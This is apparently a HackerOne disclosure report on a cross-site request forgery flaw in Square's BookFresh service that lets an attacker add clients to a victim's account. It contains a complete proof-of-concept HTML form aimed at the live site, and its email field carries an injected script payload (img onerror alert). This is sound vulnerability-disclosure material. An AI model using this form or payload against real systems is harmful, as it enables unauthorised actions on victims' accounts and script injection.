Square: CSRF on adding clients

ID H1:30004
Type hackerone
Reporter anshuman_bh
Modified 2015-02-04T19:17:48


  1. Authenticate to an account.

  2. Trick the victim to submit the following HTML:

<html> <body> <form action="https://www.bookfresh.com/index.html" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="add_customer" /> <input type="hidden" name="view" value="customer" /> <input type="hidden" name="action" value="add_customer" /> <input type="hidden" name="view" value="customer" /> <input type="hidden" name="first_name" value="csrf" /> <input type="hidden" name="last_name" value="test" /> <input type="hidden" name="email" value=" " /> <input type="hidden" name="phone" value=" " /> <input type="hidden" name="phone_type" value="0" /> <input type="hidden" name="cellphone" value=" " /> <input type="hidden" name="cellphone_type" value="0" /> <input type="hidden" name="company_name" value=" " /> <input type="hidden" name="address1" value=" " /> <input type="hidden" name="address2" value=" " /> <input type="hidden" name="city" value=" " /> <input type="hidden" name="state" value=" " /> <input type="hidden" name="zipcode" value=" " /> <input type="hidden" name="birthday_month" value="1" /> <input type="hidden" name="birthday_day" value="1" /> <input type="hidden" name="birthday_year" value="1920" /> <input type="hidden" name="notes" value=" " /> <input type="hidden" name="merchant_email" value=""><img src=x onerror=alert(1)> "><img src=x onerror=alert(1)><anshuman.bhartiya+4@gmail.com>" /> <input type="hidden" name="subject" value="You're invited to book online" /> <input type="hidden" name="greeting" value="Dear csrf," /> <input type="hidden" name="message" value="As one of my most valued clients, I wanted to tell you about a new service I am now offering: online appointments. It's a fast and easy way for you to make an appointment with me, and it's completely free. To get started, just click the link below that will take you to my personalized online calendar. Thank you, - "" " /> <input type="hidden" name="merchant_hourtown_address" value="https://www.bookfresh.com/" /> <input type="hidden" name="_submit_button" value="Add Customer" /> <input type="submit" value="Submit request" /> </form> </body> </html>

  1. You will be redirected to a page which says "The page isn't redirecting properly" (Tested in Firefox). See screenshot.

  2. But, then when you go to clients, you will notice that a new client has been added. See screenshot.

An attacker can trick victim users to add clients without the victim's knowledge.